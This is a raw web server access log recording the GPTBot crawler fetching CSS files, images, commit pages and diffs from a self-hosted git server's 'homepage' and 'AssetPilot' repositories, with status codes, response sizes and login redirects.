(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -[17/Feb/2026:19:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -[17/Feb/2026:19:54:24 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:19:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -[17/Feb/2026:19:54:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:19:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fcss" [Client 74.7.227.38] [Length 23206] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/html/assets/css" -[17/Feb/2026:19:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fcss" [Client 74.7.227.38] [Length 22748] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/html/assets/css" -[17/Feb/2026:19:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fcss" [Client 74.7.227.38] [Length 24440] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/html/assets/css" -[17/Feb/2026:19:54:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:19:54:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:19:54:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:19:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10355] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" -[17/Feb/2026:19:54:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:19:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" [Client 74.7.227.38] [Length 10100] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:19:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" -[17/Feb/2026:19:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" -[17/Feb/2026:19:54:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:19:54:33 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:19:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" [Client 74.7.227.38] [Length 10077] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" -[17/Feb/2026:19:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" -[17/Feb/2026:19:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" [Client 74.7.227.38] [Length 10044] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" -[17/Feb/2026:19:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" [Client 74.7.227.38] [Length 10078] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" -[17/Feb/2026:19:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10052] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" [Client 74.7.227.38] [Length 10308] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" -[17/Feb/2026:19:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10379] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" -[17/Feb/2026:19:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10143] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" -[17/Feb/2026:19:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" [Client 74.7.227.38] [Length 10130] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" -[17/Feb/2026:19:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" [Client 74.7.227.38] [Length 10076] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" -[17/Feb/2026:19:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" -[17/Feb/2026:19:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" [Client 74.7.227.38] [Length 10135] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" -[17/Feb/2026:19:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" -[17/Feb/2026:19:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" -[17/Feb/2026:19:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic%2fcss" [Client 74.7.227.38] [Length 60961] [Gzip 11.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic%2fcss" [Client 74.7.227.38] [Length 34969] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" [Client 74.7.227.38] [Length 10071] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" -[17/Feb/2026:19:54:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" [Client 74.7.227.38] [Length 10105] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" -[17/Feb/2026:19:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" [Client 74.7.227.38] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" -[17/Feb/2026:19:54:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" [Client 74.7.227.38] [Length 10112] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" -[17/Feb/2026:19:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10030] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" [Client 74.7.227.38] [Length 10129] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" -[17/Feb/2026:19:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20083] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" -[17/Feb/2026:19:54:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:19:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css/style.css" [Client 74.7.227.38] [Length 13119] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" -[17/Feb/2026:19:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:19:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css" [Client 74.7.227.38] [Length 12661] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" -[17/Feb/2026:19:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -[17/Feb/2026:19:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:19:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fcss" [Client 74.7.227.38] [Length 23879] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 